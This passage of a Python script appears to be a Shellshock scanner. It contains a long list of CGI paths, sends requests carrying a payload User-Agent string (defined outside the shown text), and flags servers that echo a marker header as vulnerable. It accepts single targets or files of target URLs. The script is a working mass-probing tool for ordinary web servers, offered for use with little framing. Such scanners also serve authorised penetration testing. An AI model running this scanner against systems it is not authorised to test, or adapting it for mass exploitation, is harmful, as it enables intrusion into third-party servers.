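    '/cgi-bin/mt/mt-load.cgi', '/cgi-bin/musicqueue.cgi',
    '/cgi-bin/myguestbook.cgi', '/cgi-bin/netauth.cgi', '/cgi-bin/netpad.cgi',
    '/cgi-bin/newsdesk.cgi', '/cgi-bin/nlog-smb.cgi', '/cgi-bin/nph-emumail.cgi',
    '/cgi-bin/nph-exploitscanget.cgi', '/cgi-bin/nph-publish.cgi',
    '/cgi-bin/nph-test.cgi', '/cgi-bin/pagelog.cgi', '/cgi-bin/pbcgi.cgi',
    '/cgi-bin/perlshop.cgi', '/cgi-bin/pfdispaly.cgi', '/cgi-bin/pfdisplay.cgi',
    '/cgi-bin/phf.cgi', '/cgi-bin/photo/manage.cgi',
    '/cgi-bin/photo/protected/manage.cgi', '/cgi-bin/php.cgi',
    '/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', '/cgi-bin/pollssi.cgi',
    '/cgi-bin/postcards.cgi', '/cgi-bin/powerup/r.cgi', '/cgi-bin/printenv',
    '/cgi-bin/probecontrol.cgi', '/cgi-bin/profile.cgi',
    '/cgi-bin/publisher/search.cgi', '/cgi-bin/quickstore.cgi',
    '/cgi-bin/quizme.cgi', '/cgi-bin/r.cgi', '/cgi-bin/ratlog.cgi',
    '/cgi-bin/register.cgi', '/cgi-bin/replicator/webpage.cgi/',
    '/cgi-bin/responder.cgi', '/cgi-bin/robadmin.cgi', '/cgi-bin/robpoll.cgi',
    '/cgi-bin/sbcgi/sitebuilder.cgi', '/cgi-bin/scoadminreg.cgi',
    '/cgi-bin/search', '/cgi-bin/search.cgi', '/cgi-bin/search/search.cgi',
    '/cgi-bin/sendform.cgi', '/cgi-bin/shop.cgi', '/cgi-bin/shopper.cgi',
    '/cgi-bin/shopplus.cgi', '/cgi-bin/showcheckins.cgi',
    '/cgi-bin/simplestguest.cgi', '/cgi-bin/simplestmail.cgi',
    '/cgi-bin/smartsearch.cgi', '/cgi-bin/smartsearch/smartsearch.cgi',
    '/cgi-bin/snorkerz.bat', '/cgi-bin/snorkerz.cmd', '/cgi-bin/sojourn.cgi',
    '/cgi-bin/spin_client.cgi', '/cgi-bin/start.cgi', '/cgi-bin/store.cgi',
    '/cgi-bin/store/agora.cgi', '/cgi-bin/store/index.cgi', '/cgi-bin/survey.cgi',
    '/cgi-bin/talkback.cgi', '/cgi-bin/technote/main.cgi', '/cgi-bin/test-cgi',
    '/cgi-bin/test.cgi', '/cgi-bin/test/test.cgi', '/cgi-bin/test2.pl',
    '/cgi-bin/testing_whatever', '/cgi-bin/tidfinder.cgi', '/cgi-bin/tigvote.cgi',
    '/cgi-bin/title.cgi', '/cgi-bin/traffic.cgi', '/cgi-bin/troops.cgi',
    '/cgi-bin/ttawebtop.cgi/', '/cgi-bin/ultraboard.cgi', '/cgi-bin/upload.cgi',
    '/cgi-bin/urlcount.cgi', '/cgi-bin/viewcvs.cgi', '/cgi-bin/viralator.cgi',
    '/cgi-bin/virgil.cgi', '/cgi-bin/vote.cgi', '/cgi-bin/vpasswd.cgi',
    '/cgi-bin/way-board.cgi', '/cgi-bin/way-board/way-board.cgi',
    '/cgi-bin/webbbs.cgi', '/cgi-bin/webcart/webcart.cgi', '/cgi-bin/webdist.cgi',
    '/cgi-bin/webif.cgi', '/cgi-bin/webmail/html/emumail.cgi',
    '/cgi-bin/webmap.cgi', '/cgi-bin/webspirs.cgi', '/cgi-bin/whois.cgi',
    '/cgi-bin/whois/whois.cgi', '/cgi-bin/whois_raw.cgi', '/cgi-bin/wrap',
    '/cgi-bin/wrap.cgi', '/cgi-bin/wwwboard.cgi.cgi', '/cgi-bin/YaBB/YaBB.cgi',
    '/cgi-bin/zml.cgi', '/cgi-sys/addalink.cgi', '/cgi-sys/defaultwebpage.cgi',
    '/cgi-sys/domainredirect.cgi', '/cgi-sys/entropybanner.cgi',
    '/cgi-sys/entropysearch.cgi', '/cgi-sys/FormMail-clone.cgi',
    '/cgi-sys/helpdesk.cgi', '/cgi-sys/mchat.cgi', '/cgi-sys/randhtml.cgi',
    '/cgi-sys/realhelpdesk.cgi', '/cgi-sys/realsignup.cgi', '/cgi-sys/signup.cgi',
    '/cgis/wwwboard/wwwboard.cgi', '/connector.cgi', '/cp/rac/nsManager.cgi',
    '/create_release.sh', '/CSNews.cgi', '/csPassword.cgi', '/dcadmin.cgi',
    '/dcboard.cgi', '/dcforum.cgi', '/dcforum/dcforum.cgi', '/debug.cgi',
    '/details.cgi', '/edittag/edittag.cgi', '/emumail.cgi', '/enter_bug.cgi',
    '/ez2000/ezadmin.cgi', '/ez2000/ezboard.cgi', '/ez2000/ezman.cgi',
    '/fcgi-bin/echo', '/fcgi-bin/echo2', '/Gozila.cgi', '/hitmatic/analyse.cgi',
    '/html/cgi-bin/cgicso', '/index.cgi', '/info.cgi', '/infosrch.cgi',
    '/login.cgi', '/mailview.cgi', '/main.cgi', '/megabook/admin.cgi',
    '/ministats/admin.cgi', '/mods/apage/apage.cgi', '/musicqueue.cgi',
    '/ncbook.cgi', '/newpro.cgi', '/newsletter.sh',
    '/oem_webstage/cgi-bin/oemapp_cgi', '/page.cgi', '/parse_xml.cgi',
    '/photo/manage.cgi', '/photodata/manage.cgi', '/print.cgi',
    '/process_bug.cgi', '/pub/english.cgi', '/quikmail/nph-emumail.cgi',
    '/quikstore.cgi', '/reviews/newpro.cgi', '/ROADS/cgi-bin/search.pl',
    '/sample01.cgi', '/sample02.cgi', '/sample03.cgi', '/sample04.cgi',
    '/sampleposteddata.cgi', '/scancfg.cgi', '/servers/link.cgi',
    '/setpasswd.cgi', '/SetSecurity.shm', '/shop/member_html.cgi',
    '/shop/normal_html.cgi', '/site_searcher.cgi', '/siteUserMod.cgi',
    '/submit.cgi', '/technote/print.cgi', '/template.cgi', '/test.cgi',
    '/upload.cgi', '/userreg.cgi', '/users/scripts/submit.cgi',
    '/Web_Store/web_store.cgi', '/webtools/bonsai/ccvsblame.cgi',
    '/webtools/bonsai/cvsblame.cgi', '/webtools/bonsai/cvslog.cgi',
    '/webtools/bonsai/cvsquery.cgi', '/webtools/bonsai/cvsqueryform.cgi',
    '/webtools/bonsai/showcheckins.cgi', '/wwwadmin.cgi', '/wwwboard.cgi',
    '/wwwboard/wwwboard.cgi',
]


def build_url(rhost, req):
    """Join a base URL (no trailing slash) and a resource path, trimming whitespace."""
    return rhost.strip() + req.strip()


def looks_vulnerable(headers):
    """True when the marker planted by the payload appears in the response headers."""
    return MARKER in str(headers)


def scanner(RHOST, paths=None, timeout=DEFAULT_TIMEOUT):
    """Probe every path under *RHOST* and print the ones that echo the marker.

    RHOST is a base URL such as ``http://host`` (no trailing slash); *paths*
    defaults to the module-level ``reqs`` list.  Each URL is printed with its
    status code, or with the error that prevented a response.  Returns None.
    """
    if paths is None:
        paths = reqs
    opener = build_opener()
    # Modify User-agent header value for Shell Shock test
    opener.addheaders = [('User-agent', SHOCK_UA)]
    for req in paths:
        URL = build_url(RHOST, req)
        try:
            response = opener.open(URL, timeout=timeout)
        except Exception as e:  # refused, 4xx/5xx (HTTPError), timeout, ...
            print(URL + ": " + str(e))
            continue
        try:
            headers = response.info()
            # Check server response headers for string 'TEST: TEST'
            if looks_vulnerable(headers):
                print(URL + ": is vulnerable!:")
                print(headers)
            print(URL + ": " + str(response.getcode()))
        finally:
            response.close()


def main():
    """Parse ``-r <urls-file>`` / ``-i <url>`` and run scanner() on each target."""
    parser = optparse.OptionParser(
        sys.argv[0] + ' -r <urls-file> || -i <url>   (URLs without ending slash)')
    parser.add_option('-r', dest='RHOSTS', type='string', help='specify target file with URLs')
    parser.add_option('-i', dest='RHOST', type='string', help='specify target URL')
    options, _args = parser.parse_args()

    if options.RHOSTS is None and options.RHOST is None:
        parser.print_usage()
        sys.exit(2)

    if options.RHOSTS:
        # Close the file when done; skip blank lines, which would otherwise
        # produce bare "/cgi-bin/..." URLs and one error line per path.
        with open(options.RHOSTS, 'r') as fh:
            for line in fh:
                if line.strip():
                    scanner(line)
    if options.RHOST:
        scanner(options.RHOST)


if __name__ == "__main__":
    main()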